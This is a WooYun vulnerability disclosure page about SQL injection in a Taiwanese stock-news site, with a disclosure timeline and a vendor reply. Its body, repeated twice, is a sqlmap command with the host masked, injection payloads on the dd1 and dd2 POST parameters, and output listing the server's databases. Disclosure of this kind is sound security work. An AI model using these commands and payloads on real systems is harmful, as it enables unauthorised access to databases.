当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153107

漏洞标题:台湾某股市详情网存在sql注入(臺灣地區)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 头晕脑壳疼

提交时间:2015-11-11 09:21

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

sqlmap -u "http://**.**.**.**/DP/Sin/News.asp" --data "B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04&yy2=2015&mm2=11&dd2=09&yy1=2015" --dbs


Parameter: dd2 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04&yy2=2015&mm2=11&dd2=09' AND 6128=6128 AND 'mxVw'='mxVw&yy1=2015
Parameter: dd1 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04' AND 5334=5334 AND 'DTCl'='DTCl&yy2=2015&mm2=11&dd2=09&yy1=2015
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04';WAITFOR DELAY '0:0:5'--&yy2=2015&mm2=11&dd2=09&yy1=2015
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: dd1, type: Single quoted string (default)
[1] place: POST, parameter: dd2, type: Single quoted string
[q] Quit
>
[18:29:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[18:29:04] [INFO] fetching database names
[18:29:04] [INFO] fetching number of databases
[18:29:04] [INFO] resumed: 8
[18:29:04] [INFO] resumed: Berich
[18:29:04] [INFO] resumed: Berich_GL
[18:29:04] [INFO] resumed: master
[18:29:04] [INFO] resumed: model
[18:29:04] [INFO] resumed: msdb
[18:29:04] [INFO] resumed: Northwind
[18:29:04] [INFO] resumed: pubs
[18:29:04] [INFO] resumed: tempdb
available databases [8]:
[*] Berich
[*] Berich_GL
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[18:29:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'
[*] shutting down at 18:29:04

漏洞证明:

sqlmap -u "http://**.**.**.**/DP/Sin/News.asp" --data "B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04&yy2=2015&mm2=11&dd2=09&yy1=2015" --dbs


Parameter: dd2 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04&yy2=2015&mm2=11&dd2=09' AND 6128=6128 AND 'mxVw'='mxVw&yy1=2015
Parameter: dd1 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04' AND 5334=5334 AND 'DTCl'='DTCl&yy2=2015&mm2=11&dd2=09&yy1=2015
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04';WAITFOR DELAY '0:0:5'--&yy2=2015&mm2=11&dd2=09&yy1=2015
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: dd1, type: Single quoted string (default)
[1] place: POST, parameter: dd2, type: Single quoted string
[q] Quit
>
[18:29:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[18:29:04] [INFO] fetching database names
[18:29:04] [INFO] fetching number of databases
[18:29:04] [INFO] resumed: 8
[18:29:04] [INFO] resumed: Berich
[18:29:04] [INFO] resumed: Berich_GL
[18:29:04] [INFO] resumed: master
[18:29:04] [INFO] resumed: model
[18:29:04] [INFO] resumed: msdb
[18:29:04] [INFO] resumed: Northwind
[18:29:04] [INFO] resumed: pubs
[18:29:04] [INFO] resumed: tempdb
available databases [8]:
[*] Berich
[*] Berich_GL
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[18:29:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'
[*] shutting down at 18:29:04

修复方案:

版权声明:转载请注明来源 头晕脑壳疼@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-20 06:30

厂商回复:

感謝通報

最新状态:

2016-01-07:HITCON 於接獲通報後多次 email 該網站所示之服務信箱,至今尚無回應。